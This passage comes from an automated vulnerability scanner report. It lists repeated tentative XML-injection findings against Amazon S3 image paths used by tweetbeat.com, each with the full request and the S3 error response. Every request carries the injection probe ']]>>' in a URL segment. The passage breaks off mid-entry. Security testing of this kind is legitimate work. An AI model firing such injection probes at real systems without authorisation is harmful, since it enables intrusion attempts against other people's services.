The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17605/phils%20victorino.jpg?1305320043 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: C45C394415BD7187
x-amz-id-2: 8xz29IkgXgiD5k/Yx7nTq7nJQZ08a5IqwBRkW5Tz4HrdsmgZKxmmeRwZRJyDEMEy
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:03 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C45C394415BD7187</RequestId><HostId>8xz29IkgXgiD5k/Yx7nTq7nJQZ08a5IqwBRkW5Tz4HrdsmgZKx
...[SNIP]...

8.23. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17605]]>>/phils%20victorino.jpg?1305320043 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 34D40D599E142219
x-amz-id-2: c+EVB1wyuqT9LT0+9nJDwEsCUy199quWtu1K4HYlk4Axm3tRPiIESCOG+LMVw7iw
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:04 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>34D40D599E142219</RequestId><HostId>c+EVB1wyuqT9LT0+9nJDwEsCUy199quWtu1K4HYlk4Axm3tRPi
...[SNIP]...

8.24. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17605/phils%20victorino.jpg]]>>?1305320043 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: CE14F74653148B63
x-amz-id-2: x44WSqKVIOGk92oM0ghAhLWph/XFUWmN8zdRUe2zJtH5D2fhGg6XHgC3TRIy8Btg
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:05 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CE14F74653148B63</RequestId><HostId>x44WSqKVIOGk92oM0ghAhLWph/XFUWmN8zdRUe2zJtH5D2fhGg
...[SNIP]...

8.25. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 675C018B90E83DEA
x-amz-id-2: qX+Ou5K40rmd2sfIDCwI6Om5pxCNWmDUi/9IVZa3WOFkL2D4nqLC8ln7zPMmd7+Q
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:09 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>675C018B9
...[SNIP]...

8.26. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17612/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 67C303817CA12F59
x-amz-id-2: Oa1ZuGuSi+CUGvEFUa2d3HEImSTOn6LNNcokOpcXa/jcwPtj8wYGpZEIzQiTI54/
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:11 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>67C303817CA12F59</RequestId><HostId>Oa1ZuGuSi+CUGvEFUa2d3HEImSTOn6LNNcokOpcXa/jcwPtj8w
...[SNIP]...

8.27. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17612]]>>/thunder%20grizz%20g7.jpg?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 1DC9E63BB64255C0
x-amz-id-2: JqDEzKWqbm5clNZ5/+mSk6fVkubJKK8+7cL4V25oD7R+2QxVRroDkIRyEMk59RnW
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1DC9E63BB64255C0</RequestId><HostId>JqDEzKWqbm5clNZ5/+mSk6fVkubJKK8+7cL4V25oD7R+2QxVRr
...[SNIP]...

8.28. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17612/thunder%20grizz%20g7.jpg]]>>?1305322024 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 795615118156FA69
x-amz-id-2: oDq5NVp6wLnICEIs19bjnfB2bA7ld6SSlco+z/WA4Npsv6KykRs8IJkBnNc3omTe
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>795615118156FA69</RequestId><HostId>oDq5NVp6wLnICEIs19bjnfB2bA7ld6SSlco+z/WA4Npsv6KykR
...[SNIP]...

8.29. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17619/Morganza%20%20spillway.jpg?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 7E074A9965E30E2F
x-amz-id-2: 4ciSu5Qt+9M4FlVPy6lPN/sFliApYxWjYFu7jWDRK/1T9OO6VBwoYzzEmlnAhR9I
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:08 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>7E074A996
...[SNIP]...

8.30. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17619/Morganza%20%20spillway.jpg?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: BBDF88B0F79F11B0
x-amz-id-2: ycc6cKjByjaZf6ImQV5ZNOJR9Yi94Pib5ZQ+Ogb6SK3F98wKEoKe+asZiaSSHjlg
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:11 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BBDF88B0F79F11B0</RequestId><HostId>ycc6cKjByjaZf6ImQV5ZNOJR9Yi94Pib5ZQ+Ogb6SK3F98wKEo
...[SNIP]...

8.31. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17619]]>>/Morganza%20%20spillway.jpg?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: EE516C16EAF5468A
x-amz-id-2: PUzYJu2LzZxrPE046BTPsq2RQo7H9sjQV9csFLUjLd0w9sY5M7dMFc7NusC7XUrh
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EE516C16EAF5468A</RequestId><HostId>PUzYJu2LzZxrPE046BTPsq2RQo7H9sjQV9csFLUjLd0w9sY5M7
...[SNIP]...

8.32. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17619/Morganza%20%20spillway.jpg]]>>?1305324901 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 68208926DAEAC214
x-amz-id-2: OZNUXJqRcH9uUw/vSI7oqvbJ3VkG3IjbJy5UGFwztBe6IkqFyMiLD2zkOp4DqQju
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>68208926DAEAC214</RequestId><HostId>OZNUXJqRcH9uUw/vSI7oqvbJ3VkG3IjbJy5UGFwztBe6IkqFyM
...[SNIP]...

8.33. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17655/AP11051412618.jpg?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: BDBF654F74924D3C
x-amz-id-2: okBiAYqEksGNL0FGUHD1Rf8iRsV5ZXA/X3yEa4qjgoyirNVSdBcg5y8mzyxA4obu
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:12 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>BDBF654F7
...[SNIP]...

8.34. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17655/AP11051412618.jpg?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 3C475520989A1025
x-amz-id-2: WFuGv/mlw5ZxDc4HdmrV+ayKvREvVQDBpn4Y2lnimqscj9CT8inL0V59/NL6MTLJ
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:13 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3C475520989A1025</RequestId><HostId>WFuGv/mlw5ZxDc4HdmrV+ayKvREvVQDBpn4Y2lnimqscj9CT8i
...[SNIP]...

8.35. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17655]]>>/AP11051412618.jpg?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 112859293572DB01
x-amz-id-2: 2K5EeyoO7n+bYZ/5MObt5l7VyjtuWfmPz7rJOnKyelke3tqcskOz+7vpkJmujN8B
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:14 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>112859293572DB01</RequestId><HostId>2K5EeyoO7n+bYZ/5MObt5l7VyjtuWfmPz7rJOnKyelke3tqcsk
...[SNIP]...

8.36. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17655/AP11051412618.jpg]]>>?1305417753 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: BA6C0DD285592A5C
x-amz-id-2: UGO4ZocFHXMwysgVdHdTafcjPWTHg683Y0ynHCPuPzOxQkuPTy9SNG3nAU0hxdFZ
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA6C0DD285592A5C</RequestId><HostId>UGO4ZocFHXMwysgVdHdTafcjPWTHg683Y0ynHCPuPzOxQkuPTy
...[SNIP]...

8.37. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics]]>>/thumb_100/17656/AP110416146360.jpg?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
x-amz-request-id: D86E046F30C98738
x-amz-id-2: qwwXq2c74gcwdsA2ma/vOy6Y7qeBBy1mtasgsCK7gSSazBxaYY5eYrLagNAZQviv
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:18 GMT
Server: AmazonS3
Content-Length: 308

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>tweetbeat_event_pics]]&gt;&gt;</BucketName><RequestId>D86E046F3
...[SNIP]...

8.38. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100]]>>/17656/AP110416146360.jpg?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: CF818E3299156252
x-amz-id-2: V7NTM6DsJj9JPNAAU+je+fWZMl9fNQe9HgRYgBOZh/anadtokEVXVrFwyTQyd83V
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:20 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CF818E3299156252</RequestId><HostId>V7NTM6DsJj9JPNAAU+je+fWZMl9fNQe9HgRYgBOZh/anadtokE
...[SNIP]...

8.39. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tweetbeat_event_pics/thumb_100/17656]]>>/AP110416146360.jpg?1305419433 HTTP/1.1
Host: s3.amazonaws.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: F7E76CE42E5F86AC
x-amz-id-2: T2ZYlxh5WzMb2z2pnmOt9lGxAhG/AfJzridTdN6/CDeauJui66BHsnD2pczjgvTc
Content-Type: application/xml
Date: Sun, 15 May 2011 20:03:21 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F7E76CE42E5F86AC</RequestId><HostId>T2ZYlxh5WzMb2z2pnmOt9lGxAhG/AfJzridTdN6/CDeauJui66
...[SNIP]...

8.40. http://s3.amazonaws.com/tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s3.amazonaws.com
Path:   /tweetbeat_event_pics/thumb_100/17656/AP110416146360.jpg

Issue detail

